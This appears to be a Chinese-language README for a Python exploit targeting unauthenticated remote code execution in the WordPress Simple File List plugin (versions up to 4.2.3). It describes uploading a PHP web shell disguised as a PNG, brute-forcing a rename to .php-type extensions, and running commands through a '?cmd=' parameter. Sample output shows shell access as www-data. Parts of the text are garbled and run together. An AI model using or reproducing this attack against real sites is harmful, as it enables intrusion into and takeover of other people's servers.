⚠️ 漏洞利用代码作者:Mrj Haxcore
一个针对 WordPress Simple File List 插件 (<= 4.2.3) 的完整 Python 漏洞利用脚本,该插件因不安全的文件上传和重命名逻辑而存在未认证的远程代码执行 (RCE) 漏洞。
simple-file-list).png 的 PHP 文件,随后将其重命名为 .php 并执行任意代码。multipart/form-data(绕过 415 错误).php、.php5、.phtml 等后缀进行重命名暴力破解?cmd= 执行命令�PNG 垃圾数据)python3 simple.py https://target.site
[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
手动访问
https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami